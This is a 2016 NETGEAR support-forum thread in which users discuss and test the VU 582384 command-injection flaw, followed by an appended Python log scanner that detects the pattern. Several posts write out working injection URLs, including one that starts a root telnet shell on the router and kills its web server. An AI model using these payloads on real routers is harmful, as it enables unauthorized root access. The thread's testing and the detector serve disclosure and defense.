3v3ntH0riz0n
Dec 09, 2016, Apprentice
NETGEAR Routers and CVE-2016-582384 security vulnerability
I am a bit concerned about this recent article: http://www.zdnet.com/article/two-netgear-routers-are-vulnerable-to-trivial-to-remote-hack/ https://www.kb.cert.org/vuls/id/582384 Details: Overview Net...
- Dec 12, 2016
NETGEAR is aware of the security issue #582384 affecting R6250, R6400, R6700, R6900, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400 routers. Stay updated here: http://kb.netgear.com/000036386/CVE-2016-582384
We now have beta firmware containing fixes for some affected models.
We're working hard on fixes for the other affected models and will update the security ticket above soon.
**** UPDATE from NETGEAR - Added by ChristineT on 12/15/16 at 10:30 AM PST ****
To our NETGEAR Community, we sincerely apologize for any complications you may have encountered due to the recently publicized vulnerability, referred to as VU 582384. We initially became aware of this vulnerability last Friday when CERT emailed us, and because we had no record of a prior report, we began our standard process of validation prior to making any public statements.
Once it had been disclosed that the first notification actually occurred in August, we conducted a search and confirmed this was the case. Admittedly, this was an oversight on our part. While no security reporting system is perfect, we aim to do better, and are evaluating how to improve our response process.
NETGEAR has created a channel for security researchers and other members of the public to contact us regarding potential security issues affecting NETGEAR products (security@netgear.com), which is publicly disclosed from the NETGEAR Product Security Advisory page. We receive numerous emails through this channel, the overwhelming majority of which, on review, do not raise product security issues. When we do recognize that there is a security risk to our customers, we work diligently to address them in a timely manner, as we have done in this case since learning about it last Friday.
Security Advisory for VU 582384 knowledgebase article.
NETGEAR Product Security Advisory page.
IrvSp
Dec 10, 2016, Master
I tried using a supposed exploit from HERE and entered for the URL http://192.168.1.1/cgi-bin/;ls and all I see is partial HTML display?
Entering http://192.168.1.1/cgi-bin/;COMMAND did the same?
Am I missing something here?
wawilmsn
Dec 10, 2016, Guide
My router is at 192.168.1.254. First, I checked by going to the router web GUI and received the authentication page, since I was not logged in. I wanted to make sure my login was not cached.
Then, I did exactly what you did. I copied your link with the "ls" in the line, substituting .254 for .1.
Here is what I got back -- and yes, it is a partial HTML display, but it is a valid and proper response to the ls command -- it gave a directory listing:
bin dev etc lib media mnt opt proc sbin share sys tmp usr var www
I was using a Chrome browser on a Mac, but that should not matter. Bottom line - at least for me is that it ran the ls command.
I am going to try to go back to a previous SW release and hope it works without the flaw. Otherwise, I will have to try Tomato or DD-WRT, and I really do not want to have to do that and reset everything.
- wawilmsn, Dec 10, 2016, Guide
SUCCESS! ! !
At least for the R8000 router.
I downgraded to V1.0.2.46_1.0.97, which is the most recent non-current version. The downgrade went flawlessly -- no problems at all. I did not lose any settings, so all seems to be working. I tried the exploit and it did not work. Like others have reported (after making sure I was logged out of the router), it returned a page saying I was not authorized.
I hope Netgear will provide a new software update for the router. I do not like running an old version -- I feel like there were probably some problems that were fixed in the newer version, but the newer version has an extremely dangerous flaw.
Someone mentioned connecting via the internet (WAN) side vs the LAN or home side. The PROBLEM is, that your web browser AT HOME, within your LAN could go to a web page, even on a well known site that has a link on a picture (or like within an ad) that has that command embedded. You do not have to type it in to the top line. It can be an embedded link, and it will run the link and affect the router.
But -- good for now -- or at least, I feel safer.
- wawilmsn, Dec 10, 2016, Guide
WOOPSEY -- I was wrong.
It seemed like the fix (downgrading) worked. I even tried a couple of times. But after closing the web browser and going back to try again (I was going to try with and without the cgi-bin in the line), it FAILED. That is, it returned the directory listing. I checked, and the router is reporting the older software, so for some reason, it does not work either, and is subject to the flaw. I will be going back to the current software, but still looking for a fix. It looks like a basic problem.
So, just to confirm, with the older software V1.0.2.46_1.0.97, I still have the problem.
- Coherent_Lite, Dec 10, 2016, Guide
Drat. Sorry to hear it. I tried doing what you described with my R7000 and it seems to still be "safe". I will treat it as a "suspect work-around".
Thanks for the update.
- IrvSp, Dec 10, 2016, Master
Yes, I did get that at the bottom,
=========
bin dev etc lib media mnt opt proc sbin share sys tmp usr var www
However, there were umpteen lines above it with partial HTML:
alue) { var button; button=document.getElementsByName('buttonHit'); button[0].value=btn.name; button=document.getElementsByName('buttonValue'); button[0].value=value; return true; } function clickButton(message) { alert(message); } function mainOnload() { } function changeCursorPointer() { document.body.style.cursor='pointer'; } function changeCursorDefault() { document.body.style.cursor='default'; } function iframeResize(iframe){ alert("Enter iframeResize "+iframe); if(iframe && !window.opera){ if(iframe.contentDocument && iframe.contentDocument.body.offsetHeight){ alert('before '+iframe.height+" document "+iframe.Document.body.offsetHeight); iframe.height=iframe.contentDocument.body.offsetHeight+80; alert('after '+iframe.height); } else if(iframe.Document && iframe.Document.body.scrollHeight){ alert('before '+iframe.style.height+" document "+iframe.Document.body.scrollHeight); iframe.style.height=iframe.Document.body.scrollHeight; alert('after '+iframe.style.height);
Literally hundreds of lines like that.
Although the end is the expected output, does that really mean 'something' could be done to/on the router?
- wawilmsn, Dec 10, 2016, Guide
I would assume - yes. You asked for a directory listing, and it gave it to you. The report is, that telnet worked also. I could not think of an easy command to use that would prove a security breach without doing harm. I have gone back and forth with the old and new software a couple of times now, and have made sure that browser cache was cleared each time, and that I was not logged into the router. And, it FAILED every time. That is, even with the older software, the security problem still existed. I got a directory listing with the "ls" command issued.
I will have to try Tomato this afternoon. Or go buy (another) new, expensive router.
- GinaGerson, Dec 10, 2016, Star
Temporary solution can be found here.
tl;dr – a quick overview
Here are the three steps (explanation below):
- Open a web browser and visit the following URL:
http://[router-address]/cgi-bin/;telnetd$IFS-p$IFS'12346'
(it’ll look like it’s loading a page, just leave the window open and continue with the next step)
- Type the following in a console / terminal window / command prompt:
telnet [router-address] 12346
You will (should) now have BusyBox root access to your router.
- Type in the following to terminate the router’s web server process:
killall httpd
done!
- Open a web browser and visit the following URL:
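As an added example (not from the thread or from NETGEAR), here is a small Python scanner a defender could run over the router's or a proxy's HTTP access log to spot the `/cgi-bin/;command` injection pattern discussed above, including the percent-encoded form and the `$IFS` spacing used in the telnetd workaround. The log lines are constructed sample data in Common Log Format; the regexes and function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real captures). Note that the sources
# are LAN addresses: as wawilmsn points out, a drive-by link loaded by a browser
# inside the LAN triggers the same request, so an internal client IP is not benign.
SAMPLE_LOG = """\
192.168.1.10 - - [10/Dec/2016:14:02:11 -0800] "GET /cgi-bin/;ls HTTP/1.1" 200 5120
192.168.1.10 - - [10/Dec/2016:14:03:40 -0800] "GET /cgi-bin/;telnetd$IFS-p$IFS'12346' HTTP/1.1" 200 0
192.168.1.12 - - [10/Dec/2016:14:05:02 -0800] "GET /cgi-bin/%3Bls HTTP/1.1" 200 5120
192.168.1.12 - - [10/Dec/2016:14:06:15 -0800] "GET /start.htm HTTP/1.1" 200 8802
192.168.1.15 - - [10/Dec/2016:14:07:00 -0800] "GET /cgi-bin/genie.cgi?key=1 HTTP/1.1" 200 340
"""

# Pull the request line out of a CLF entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# A shell separator in the path part (before any '?') that follows /cgi-bin/.
INJECTION_RE = re.compile(r'/cgi-bin/[^?]*?[;|&`]')
# $IFS is the Bourne-shell field separator; the workaround uses it in place of spaces.
IFS_RE = re.compile(r'\$\{?IFS\}?')


def normalize_path(raw):
    """Percent-decode the path (twice, to catch double encoding) and expand $IFS to spaces."""
    path = raw
    for _ in range(2):
        path = unquote(path)
    return IFS_RE.sub(' ', path)


def classify(line):
    """Return (client_ip, decoded_path, injected_command) for a suspicious line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = normalize_path(m.group('path'))
    if not INJECTION_RE.search(path):
        return None
    # Everything after the separator, up to the query string, is what the shell would run.
    command = path.split('/cgi-bin/', 1)[1].lstrip(';|&` ').split('?', 1)[0]
    return line.split(' ', 1)[0], path, command


def scan(log_text):
    """Scan a whole log and return the list of suspicious hits in order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == '__main__':
    for ip, path, command in scan(SAMPLE_LOG):
        print(f'{ip}\t{path}\t-> {command}')
```

Legitimate CGI calls with a query string (`genie.cgi?key=1`) are not flagged because the separator check stops at the `?`.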